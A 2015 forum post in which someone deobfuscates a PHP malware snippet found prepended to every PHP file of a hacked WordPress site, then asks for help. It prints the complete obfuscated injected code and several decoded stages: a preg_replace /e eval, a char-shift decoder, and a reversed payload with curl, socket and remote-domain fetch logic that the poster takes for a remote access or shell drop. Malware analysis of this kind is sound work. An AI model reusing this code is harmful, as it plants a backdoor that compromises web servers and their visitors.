Show Posts
1
Web Oriented Coding / Deobfuscating a php hack
« on: November 12, 2015, 06:19:02 pm »
A few days ago, I stumbled upon something weird in a wordpress site : all the .php files (conf, plugins, themes, etc) were prepended with a heavily obfuscated php snippet.
Honestly I don't really care how it got there in the first place, the wordpress site was outdated, so were its plugins, so I guess one of them had a vulnerability. However, I figured it would be quite interesting to check what is was doing, so I tried to deobfuscate it.
Disclaimer : I coded using php for the last time ten years ago, and have been pretty much uninterested with this language since then. So bear with me if this is all standard stuff
Here is the original snippet :
The first thing I did was to decode hex and octal characters.
First there are some user agent checks, a data string, an array, and a function definition.
Then the interesting part boils down to a hidden eval with the /e flag in preg_replace :
I echoed what was passed to eval() after the replacements functions took place, and got another function definition and another hex / octal obfuscated preg_replace :
This is where things get really interesting, but really complicated.
What I got after echoing the data passed in and decoding it is :
It looks like most of this string can be read in reverse (as hinted by strrev anyway) and some characters are replaced using rand functions.
We can easily see very interesting strings, headers, curl, .. Looks like a remote access / shell drop.
However I'm a bit stuck at this point, this code is beyond my php skills to fully reverse engineer.
Do you have any pointers to help me finish this ?
Honestly I don't really care how it got there in the first place, the wordpress site was outdated, so were its plugins, so I guess one of them had a vulnerability. However, I figured it would be quite interesting to check what is was doing, so I tried to deobfuscate it.
Disclaimer : I coded using php for the last time ten years ago, and have been pretty much uninterested with this language since then. So bear with me if this is all standard stuff
Here is the original snippet :
Code: [Select]
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $pdwpfcjohw = 'w;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{825:-t%x5c%x7825)3of:opjudovg<~%x578256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5c%x782bfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5cr(ord($n)-1);} @error_reporting(0); pre]63]y3:]68]y76#<%x5c%x78e%x5c%x78b%-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fec%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjgA%x5c%x6<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5cx5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x78x7827k:!ftmf!}Z;^nbsbq%x5c%x787]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83472%x5c%x7824<!%x5c%x7825mm!>!#]y81]2<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%%141%x72%164") && (!isset($GLOBA#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{sut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cdc%x7825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyf7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%xx7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCc%x7825<#372]58y]472]37y]672]48y]#>825V<*#fopoV;hojepdoF.uofuopD#)sfec%x782f!#0#)idubn%x5c%x7860hfsq)!spd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<*)) { $GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){return chT7-UFOJ%x5c%x7860GB)fu7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftD4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%A)qj3hopmA%x5c%x78273qj%x5c%x74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y3827rfs%x5c%x78256~6<%x5c%x787fw6<*7825mm)%x5c%x7825%x5c%x7878:!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpu{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825if((function_exists("%x6f%142%x5f%163%x74LS["%x61%156%x75%156%x61"]))**X)ufttj%x5c%x7822)gj!|!*!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!w6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tu}#-!tussfw)%x5c%x7825c*W%x5c%x7825**f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5w6Z6<.5%x5c%x7860hA%x5c%x782725)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fm3q%x5c%x7825}U;y]}R;2]},;osv-id%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpuf]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]46x7825!>!2p%x5c%x7825!*x66%152%x66%147%x67%42%x2c%163%x74%162%x5f%163%x70%154%x6-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%x7825-bubEc%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbutc%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*o%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7R%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-Sc%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2%166%x61%154%x28%151%x6d6g]273]y76]271]y7d]252]yw*[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x5c%x56]y81]265]y72]254]y]y76]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y7d]252]y7425%x5c%x785cSFWSFT%x5c%x7860%x5c%x78%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sx5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpgx7825:>:r%x5c%x7825:|:**t%x5c%x78)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1tww**WYsboepn)%x5c%x7825bss-%x5c%x7ppde#)tutjyf%x5c%x78604%x5c%x78223x782fh%x5c%x7825:<**#57]38y]47]67ydovg!|!**#j{hnpd#)tutjyf%x5c%x7860785c1^-%x5c%x7825r%x5c%x785c2^-%x573]y76]258]y6g]273]y76]271]y7d]252]y74]2561L3]84]y31M6]y3e]81#%x5c%x782f#7e:55946-[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%xz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmo!%x5c%x7825bss%x5c%x785csboe)82f#M5]DgP5]D6#<%x5c%x7825fdy>#]x7825b:<!%x5c%x7825c:>%x5c%x7825s:%u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x7875:<#64y]552]e7y]#>n%x59%164%50%x22%134%x78%62%x35%165%x3a%146%x21%7q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x78N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x783>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18R#>q%x5c%x7x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%x5c%x7827p985-rr.93e:5597f-s.973:8297f:2400~:<h%x5c%x7825_t%x5c%x7825:osvufs:~:<*9-1-rc%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fpd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5827pd%x5c%x78256<pd%x5c%76#<%x5c%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%x7825t2w>s:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]V,6<*)ujojR%x5c%x7827id%x5c%x7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256fmy%x5c%x7825)utjm!|!*5!%%x782272qj%x5c%x7825)7gj6<822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bdde>u%x5c%x7825V<#65,47R2;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7bfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tc%x7878pmpusut!-#j0#!%x5c%x824-%x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x7]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%x78x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)uft2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQf<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)pp)1%x5c%x782f35.)1%x5c%x782f14+9**-)%x5c%x7824!>!fyqmpefpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%xx5c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f<24-%x5c%x7824*<!%x5c%x7824-%x5c%x7824g%x5c%x7827Y%x5c%x7825GFS%x5c%x7860QUUI&c_UOFHB%x5c%x2f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x78#!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%782f!**#sfmcnbs+yfeobuhofm%x5c%x7825:-5ppde:4:|:**#<!%x5c%x7825t::!>!%x5c%x7c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%x7#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%57-K)fujs%x5c%x7878X6<#o%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npfr%x5c%x7825%x5c%x782fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]87827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSF#-#Y#-#D#-#W#-#C#-#O#-#*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787f%x5c%x7825)}.;%x5c%x7860UQPMSVD!K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7825c%x787f;!opjudovg}k~~9{d%x5c%x7825:osvufqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x786>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825zji%x5c%x7878:<##:>:h%x5c%x782t%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gv]o]Y%x5c%x78257;utpI#7>%x5c%x782g_replace("%x2f%50%x2e%52%x29%57%x65","%x65,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x785,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,#]#>m%x5c%x7825:|:*r%x5c%x7x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%8%x5c%x7824-%x5c%x7824]26%x5c0439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:ix5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x7825c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}334}}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5hpph#)zbssb!-#}#)fepmqnj!%x5eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5cpdof%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%%x5c%x7824-%x5c%x782h%x5c%x7825)j{hnpd!opjububE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]24525nfd>%x5c%x7825fdy<Cb*%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x7825c:>1<%c%x7824!>!tus%x5c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x66~6<&w6<%x5c%x787fw67860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x>>2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c4]284]364]6]234]342]58]24]31#-%x5c%x7825tdz*Wsfuvs56<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5c%x782f77827u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x7829]271]y83]256]y78]248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c6%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3fofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x57825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%8256<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{6d%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7#6#)tutjyf%x5c%x786kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7]37]88y]27]28y]#%x5c%x782**2qj%x5c%x7825)hopm3qj%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61%160%x28%42%s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48ytj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825FGTOBSUOSVUFS,6<*msv%x5c%x78257-MS#-%x5c%x7825tmw)%x5c%x7825x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]3hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7x7860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%0un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!***b%x5c%x7825)sf%x5%x7825,3,j%x5c%x7825>j%x5825!*##>>X)!gjZ<#opo#>b%x5c%x7825!]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]2824Ypp3)%x5c%x7825cB%x5c%x7825iNutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;2]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", NULL); }ps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x7825c%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}24-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x765]D8]86]y31]278]y3f]55c}X%x5c%x7824<!%x5c%x7825tzw>!#2)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDP4*<!~!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x5c%x7825)s%x5c%x7825>%x5c%opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<#ufs}%x5c%x7827;mnui}&;zepc}A;~!825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74%x7824-%x5c%x7824<%x5c%x7825j,25}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%xx78b%x5c%x7825ggg!>!#]y81]273]y76]258]y%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%xboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%5297e:56-%x5c%x7878r.985:52985-t.98]K4])#%x5c%x7824*<!%x5c%x78251%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%x5c7824y4%x5c%x7824-%x5c%x7824]y/(.*)/epreg_replaceqfbyqgiljb'; $idkmtooiel = explode(chr((154-110)),'1748,41,781,32,1789,28,1309,69,195,39,6550,43,2697,24,8503,68,2259,57,3617,45,8051,43,234,35,6896,47,2033,29,4312,60,5776,47,4372,24,4117,60,8246,63,1400,47,5353,59,7826,60,5862,24,6518,32,3850,63,1582,34,6243,53,9411,45,1378,22,144,51,4653,26,8480,23,1490,29,92,52,7767,59,4576,52,5115,68,8638,42,5565,21,498,54,9526,42,429,69,6045,56,8838,45,986,55,2580,59,8680,34,4546,30,8196,50,7484,21,6175,36,1893,61,8094,56,392,37,6211,32,2133,42,6475,43,9251,39,0,58,4770,45,2362,52,1683,65,1843,50,269,57,8786,52,7986,65,8947,25,2483,62,4628,25,5057,58,7218,61,813,57,7195,23,3224,34,9596,54,5663,37,2237,22,4001,55,4679,67,5886,51,1259,50,1988,45,4253,59,6337,55,8883,64,4852,27,5700,21,3423,38,7037,28,1224,35,1644,39,870,60,5183,67,6101,51,5586,31,7505,39,8392,63,8972,34,1817,26,326,66,7132,43,592,30,2866,36,9773,39,7544,62,1041,46,6296,41,4457,37,8309,20,6839,57,5721,30,3156,34,3785,65,2414,69,5473,54,3558,37,5250,48,4746,24,6658,56,4056,61,1190,34,4815,37,9108,41,2105,28,9650,31,6994,43,2639,58,3662,63,5617,46,9379,32,2806,60,9006,70,2786,20,4396,61,3913,28,3941,60,4206,47,9568,28,3190,34,8455,25,5937,57,3023,33,2062,43,6446,29,3595,22,1155,35,8571,67,6714,26,58,34,6943,51,681,37,3292,42,5823,39,552,40,9290,67,7671,46,2545,35,4879,52,7426,58,10077,29,6810,29,9743,30,6593,65,5527,38,9205,46,7175,20,9456,70,5333,20,10007,25,8329,63,5751,25,9076,32,1954,34,7065,67,2902,68,9899,69,1087,68,2745,41,3258,34,930,56,8714,26,3121,35,9681,62,4177,29,9968,39,9357,22,3334,40,4494,52,4931,62,3491,32,1447,43,7279,69,4993,64,7348,23,3374,49,8150,46,8740,46,622,59,2175,62,7717,50,3461,30,5298,35,10032,45,7371,55,2970,53,3056,65,718,63,3523,35,6740,70,5412,61,6392,54,7606,65,9851,48,1616,28,2316,46,7950,36,6152,23,3725,60,9812,39,2721,24,1519,63,7886,64,5994,51,9149,56'); $phikeisjmv=substr($pdwpfcjohw,(70252-60146),(37-30)); if (!function_exists('jzdiphfmiu')) { function jzdiphfmiu($vkqnkrobcb, $iokxjmjsnh) { $mwknqctosj = NULL; for($iltibddrih=0;$iltibddrih<(sizeof($vkqnkrobcb)/2);$iltibddrih++) { $mwknqctosj .= substr($iokxjmjsnh, $vkqnkrobcb[($iltibddrih*2)],$vkqnkrobcb[($iltibddrih*2)+1]); } return $mwknqctosj; };} $thecjqzgwu="\x20\57\x2a\40\x69\150\x72\165\x74\171\x6e\150\x66\166\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\65\x37\55\x31\62\x30\51\x29\54\x20\143\x68\162\x28\50\x35\71\x33\55\x35\60\x31\51\x29\54\x20\152\x7a\144\x69\160\x68\146\x6d\151\x75\50\x24\151\x64\153\x6d\164\x6f\157\x69\145\x6c\54\x24\160\x64\167\x70\146\x63\152\x6f\150\x77\51\x29\51\x3b\40\x2f\52\x20\160\x6f\160\x65\167\x6a\144\x63\145\x74\40\x2a\57\x20"; $xayhlwoeym=substr($pdwpfcjohw,(58620-48507),(74-62)); $xayhlwoeym($phikeisjmv, $thecjqzgwu, NULL); $xayhlwoeym=$thecjqzgwu; $xayhlwoeym=(379-258); $pdwpfcjohw=$xayhlwoeym-1; ?>
The first thing I did was to decode hex and octal characters.
First there are some user agent checks, a data string, an array, and a function definition.
Code: [Select]
<?php
if (!isset($GLOBALS["anuna"])) {
$ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
if ((!strstr($ua, "msie")) and (!strstr($ua, "rv:11")))
$GLOBALS["anuna"] = 1;
}
$pdwpfcjohw = '.....REDACTED.....';
$idkmtooiel = explode(',', .....REDACTED.....);
function jzdiphfmiu($array, $string) {
$result = NULL;
for ($i = 0; $i < (sizeof($array) / 2); $i++) {
$result .= substr($string, $array[($i * 2)], $array[($i * 2) + 1]);
}
return $result;
}
?>
Then the interesting part boils down to a hidden eval with the /e flag in preg_replace :
Code: [Select]
<?php
$phikeisjmv = "/(.*)/e";
$thecjqzgwu = " /* ihrutynhfv */ eval(str_replace('%', '\\', jzdiphfmiu($idkmtooiel,$pdwpfcjohw))); /* popewjdcet */ ";
$xayhlwoeym = "preg_replace";
$xayhlwoeym($phikeisjmv, $thecjqzgwu, NULL);
?>
I echoed what was passed to eval() after the replacements functions took place, and got another function definition and another hex / octal obfuscated preg_replace :
Code: [Select]
<?php
function fjfgg($n) {
return chr(ord($n) - 1);
}
preg_replace("/(.*)/e", "eval(implode(array_map("fjfgg",str_split(".....REDACTED.....
?>
This is where things get really interesting, but really complicated.
What I got after echoing the data passed in and decoding it is :
Code: [Select]
<?php
$t9e = '$w9 ="/(.*)/e"; $v9 = #5656}5.6%5{6))000016,J(daerW&t$(6elihw5.6qer$5;"n\0.1/PTTH6iru$6TEG"&qer$5}5;~v5;)J(esolcW@5{6))086,1pi$6,J(tcennocW@!(6fi5;)PCT_LOS6,MAERTS_KCOS6,TENI_FA(etaercW@&J5;~v5)2pi$6=!61pi$(6fi5;))1pi$(gnol2pi@(pi2gnol@&2pi$5;)X$(emanybXteg@&1pi$5;]"yreuq"[p$6.6"?"6.6]"htap"[p$&iru$5]"yreuq"[p$6))]"yreuq"[p$(tessi!(fi5;]"X"[p$&X$5;-lru_esrap@6=p$5;~v5)~^)"etaercWj4_z55}5;%v5;~v5)BV%(6fi5;)cni$6,B(edolpmi@&%5;-elif@&cni$5;~v5)~^)"elifj3_z5}5= |V:tsoh|X:stnetnoc_teg_elif|Z:kcos$|J:_tekcos|W:_lruc|Q:)lru$(|-:_TPOLRUC ,hc$(tpotes_lruc|+:tpotes_lruc|*: = |&: === |^:fub$|%:eslaf|~: nruter|v:)~ ==! oc$( fi|Y:g noitcnuf|z:"(stsixe_noitcnuf( fi { )lru$(|j}}}i$ )2 & glf$ ( fi ;1+)i$ ,"0\",ataDzg$(soprts=i$ )61 & glf$( fi ;1+)i$,"0\",ataDzg$(soprts=i$ )8 & glf$( fi }i$ ;))2,i$,ataDzg$(rtsbus,"v"(kcapnu=)nelx$(tsil { )4 & glf$( fi { )0>glf$( fi ;))1,3,ataDzg$(rtsbus(dro=glf$ ;01=i$ { )"80x\b8x\f1x\"==)3,0,ataDzg$(rtsbus( fi { )ataDzg$(izgmoc noitcnuf { ))"izgmoc"(stsixe_noitcnuf!( fi|0} ;1o$~ } ;"" = 1o$Y;]1[1a$ = 1o$ )2=>)1a$(foezis( fi ;)1ac$,"0FN!"(edolpxe@=1a$ ;)po$,)-$(dtg@(2ne=1ac$ ;4g$."/".)"moc."(qqc."//:ptth"=-$ ;)))e&+)d&+)c&+)b&+)a&(edocne-(edocne-."?".po$=4g$ ;)999999,000001(dnar_tm=po$ {Y} ;"" = 1o$ { ) )))a$(rewolotrts ,"i/" . ))"relbmar*xednay*revihcra_ai*tobnsm*pruls*elgoog"(yarra ,"|"(edolpmi . "/"(hctam_gerp( ro )"nimda",)e$(rewolotrts(soprrtsQd$(Qc$(Qa$(( fi ;)"bc1afd45*88275b5e*8e4c7059*8359bd33"(yarra = rramod^FLES_PHP%e^TSOH_PTTH%d^RDDA_ETOMER%c^REREFER_PTTH%b^TNEGA_RESU_PTTH%a$ { )(212yadj } a$Y;"non"=a$ )""==W( fiY;"non"=a$ ))W(tessi!(fi { )marap$(212kcehcj } ;))po$ ,txet$(2ne(edocne_46esab~ { )txet&j9 esle |Y:]marap$[REVRES_$|W: ro )"non"==|Q:lru|-:.".".|+:","|*:$,po$(43k|&:$ ;)"|^:"(212kcehc=|%: nruter|~: noitcnuf|j}}8zc$9nruter9}817==!9eslaf28)45@9=979{96"5"(stsixe_328164sserpmocnuzg08164izgmoc08164etalfnizg09{9)llun9=9htgnel$9,4oocd939{9))"oocd"(stsixe_3!2| * ;*zd$*) )*edocedzg*zc$(*noitcnuf*( fi*zd$ nruter ) *@ = zd$( ==! eslaf( fi;)"j"(trats_boU~~~~t$U;"54+36Q14+c6Q06+56Q26+".p$=T;"05+36Q46+16Q55+".p$=1p$;"f5Q74+56Q26+07Q"=p$U;)"enonU:gnidocnE-tnetnoC"(redaeHz)v$(jUwz))"j"(stsixe_w!k9 |U:2p$|T:x\|Q:1\|+:nruter|&:lmth|%:ydob|@:} |~: { |z:(fi|k:22ap|j:noitcnuf|w:/\<\(/"(T &z))t$,"is/|Y:/\<\/"(1p$k|R:1,t$ ,"1"."$"."n\".)(212yad ,"is/)>\*]>\^[|W# "eval(str_replace(array" "str_replace";$slv = "strrev";$s1v="create_function" #//}9.g$9;))"46\27x\36.x\26?x\16\17x\".q$.g$(m$,"*H"(p$9=9q$9{9))s$(l$<)g$(l$(9elihw9;""9=9g$9;"53x\441\d6x\"=m$;"261'x\361\26x.1\37x\"=r$;"351\36xa\07x\"=p$;"651.x\451\27x\461\37x\"=l$9{9)q$9,s$(2ne9noitcnuf;}# #1067|416|779|223|361# "preg_replace" array(#\14#,#, $#,#) { #,#[$i]#,#substr($#,#a = $xx("|","#,#,strpos($y,"9")#,# = str_replace($#,#x3#,#\x7#,#\15#,#;$i++) {#,#function #,#x6#,#)0;$i
?>
It looks like most of this string can be read in reverse (as hinted by strrev anyway) and some characters are replaced using rand functions.
We can easily see very interesting strings, headers, curl, .. Looks like a remote access / shell drop.
However I'm a bit stuck at this point, this code is beyond my php skills to fully reverse engineer.
Do you have any pointers to help me finish this ?
